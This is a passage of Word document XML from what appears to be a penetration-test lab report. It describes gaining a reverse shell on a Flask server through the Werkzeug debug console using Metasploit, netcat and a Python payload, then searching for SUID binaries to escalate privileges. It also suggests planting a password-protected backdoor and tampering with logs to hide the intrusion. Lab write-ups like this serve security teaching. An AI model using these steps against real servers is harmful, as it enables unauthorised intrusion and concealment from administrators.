              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79394879" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="259E4704" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>set rport 443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45E98C87" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC0F7C7" w14:textId="6550A6C5" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:lastRenderedPageBreak/>
        <w:t>once all the parameters are correctly configured,</w:t>
      </w:r>
      <w:r w:rsidR="002962B0">
        <w:t>(ensuring also that the LHOST is set to the Kali IP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> the exploitation can begin</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="3ED552AB" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24EE53E1" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66149642" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18D14B28" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E"/>
    <w:p w14:paraId="303CF9A0" w14:textId="5701A301" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B8B97B9" wp14:editId="3A7FE1AE">
            <wp:extent cx="5734050" cy="1454150"/>
            <wp:effectExtent l="0" t="0" r="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website&#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4050" cy="1454150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E413C87" w14:textId="78CD53EE" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>The attacker machine listens on port 4444 and wait</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> for a reverse connection</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t xml:space="preserve"> to be</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> initiated from the ubuntu server</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>. O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>nce the python reverse tcp payload reach</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> the debugger console a session is open</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> between the ubuntu server and the attacker machine, the attacker can</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> to create a channel as www-data ubuntu user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BBD2E0" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00FC43A5" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC43A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVERSE SHELL PART 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9587F6" w14:textId="396C9A16" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Another way to create a remote shell is to create a python payload and execute it directly on the browser console of the e-commerce</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t xml:space="preserve"> site</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528D9EC4" w14:textId="5F427A0D" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidR="00FC43A5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> one port must be enabled to listen tcp traffic, this can be achieved through the NetCat tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E109A19" w14:textId="1177A3FA" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6548784F" wp14:editId="651C806C">
            <wp:extent cx="3556000" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="635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56000" cy="990600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF48333" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>From the revshells.com a python reverse shell script can be generated; it is necessary provide the attacker IP address and listening port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285A3EBB" w14:textId="4AF9E554" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="283C6251" wp14:editId="150559DC">
            <wp:extent cx="5734050" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="Picture 5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websit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14:paraId="29254182" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:lastRenderedPageBreak/>
        <w:t>The python script than can be executed on the Werkzeug debug console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154EED33" w14:textId="596EF61D" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F947B51" wp14:editId="69541322">
            <wp:extent cx="5734050" cy="139700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text, application&#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4050" cy="1397000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0335922A" w14:textId="095514DB" w:rsidR="00FC43A5" w:rsidRPr="0083712C" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Once the code is executed the reverse shell connection is established with a working bin/bash shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49554654" w14:textId="0AE4B662" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6777E0C0" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>The reverse shell attack was successfully, and the flask web server fully exploit, the user www-data is the default user create from Apache and does not have a shell login, however using the command</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="73C6B1F0" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF61697" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07CD8DD4" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t xml:space="preserve">SHELL=/bin/bash script -q /dev/null </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28A53FAC" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>It is possible to have a fully bash shell access, there are different technique of privileged escalation that can be put in place to gain root control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66886A25" w14:textId="0AC80E37" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4BAD9C" wp14:editId="01D95CC1">
            <wp:extent cx="5448300" cy="16764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48300" cy="1676400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D0448" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>The reverse shell can be generated at any point, but it would be best practice for the hacker to create some backdoor persistence, maybe adding a reverse shell code when visiting a specific page using a password and to cover all the trace by tampering the logs files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D79F4C7" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEWED BY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B633E7A" w14:textId="39351074" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">Pawel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Wilkowski</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960AC47" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEW OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539C59CB" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">Successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D9B7C" w14:textId="2CD246B7" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E"/>
    <w:p w14:paraId="5E2C2677" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69734457" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EABD06" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFB8D2E" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BEEDB79" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B715410" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57983D5D" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FECE476" w14:textId="77777777" w:rsidR="00FC43A5" w:rsidRDefault="00FC43A5" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Hlk98917888"/>
    </w:p>
    <w:p w14:paraId="62465338" w14:textId="4018BBE4" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00337397" w:rsidP="00987876">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337397">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VULNERABILITY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6:</w:t>
      </w:r>
      <w:r w:rsidR="00987876" w:rsidRPr="00987876">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PRIVILEGE ESCALATION</w:t>
      </w:r>
      <w:r w:rsidR="003001C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (M)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="3EF3755E" w14:textId="2852A6C4" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="006B7F40" w:rsidP="00987876">
      <w:r>
        <w:t>In the event an</w:t>
      </w:r>
      <w:r w:rsidR="00987876" w:rsidRPr="00987876">
        <w:t xml:space="preserve"> exploitation has been successfully</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> carried out</w:t>
      </w:r>
      <w:r w:rsidR="00987876" w:rsidRPr="00987876">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00987876" w:rsidRPr="00987876">
        <w:t xml:space="preserve"> the attacker created a /bin/bash reverse shell </w:t>
      </w:r>
      <w:r>
        <w:t>as a low level user, in this scenario the</w:t>
      </w:r>
      <w:r w:rsidR="00987876" w:rsidRPr="00987876">
        <w:t xml:space="preserve"> www-data user, </w:t>
      </w:r>
      <w:r>
        <w:t>which is the generic</w:t>
      </w:r>
      <w:r w:rsidR="00987876" w:rsidRPr="00987876">
        <w:t xml:space="preserve"> Apache server user </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">account </w:t>
      </w:r>
      <w:r w:rsidR="00987876" w:rsidRPr="00987876">
        <w:t>and ha</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00987876" w:rsidRPr="00987876">
        <w:t xml:space="preserve"> limited access to the remote server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEA71D0" w14:textId="5BAEF221" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A9B0B8C" wp14:editId="0A5AE279">
            <wp:extent cx="5511800" cy="1651000"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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 application&#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11800" cy="1651000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D0A28" w14:textId="18FA6680" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:t>The aim of the attacker is to gain root access to</w:t>
      </w:r>
      <w:r w:rsidR="006B7F40">
        <w:t xml:space="preserve"> gain</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> full control of the </w:t>
      </w:r>
      <w:r w:rsidR="006B7F40">
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidR="006B7F40">
        <w:t>. Here</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> the attacker will attempt to escalate </w:t>
      </w:r>
      <w:r w:rsidR="006B7F40">
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> privilege</w:t>
      </w:r>
      <w:r w:rsidR="006B7F40">
        <w:t xml:space="preserve"> level by</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> taking advantage of misconfigured permission.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00987876" w:rsidRPr="00987876" w14:paraId="2E39994F" w14:textId="77777777" w:rsidTr="00987876">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A1B9951" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t xml:space="preserve">Command </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FD58AC6" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>find / -perm -u=s -type f 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72BB3B32" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876"/>
    <w:p w14:paraId="13DAE2A8" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:t>Running this command, the attacker can list all the file that have the SUID bit enabled. The SUID allow any user to execute the application as the owner of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F35F350" w14:textId="1EC20A98" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6916C6CF" wp14:editId="3CB59FD9">
            <wp:extent cx="5467350" cy="5130800"/>
